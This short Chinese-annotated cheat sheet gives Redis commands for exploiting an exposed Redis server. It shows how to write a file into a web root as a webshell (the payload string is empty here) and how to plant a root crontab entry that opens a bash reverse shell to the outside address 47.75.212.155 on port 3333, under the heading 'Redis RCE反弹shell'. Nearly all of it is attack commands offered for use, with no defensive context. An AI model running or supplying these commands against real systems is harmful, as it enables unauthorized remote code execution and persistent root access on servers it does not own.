config set dir /home/wwwroot/default #设置WEB写入目录
config set dbfilename test.php #设置写入文件名
set test "" #设置写入文件代码
bgsave #保存执行
save #保存执行 一条一条执行
计划任务反弹shell
config set dir /var/spool/cron/crontabs #设置写入计划任务目录
config set dbfilename root #设置写入文件名
set xx "\n\n\n* * * * * bash -i >& /dev/tcp/47.75.212.155/3333 0>&1\n\n\n" #设置写入文件代码
save #保存执行
Redis RCE反弹shell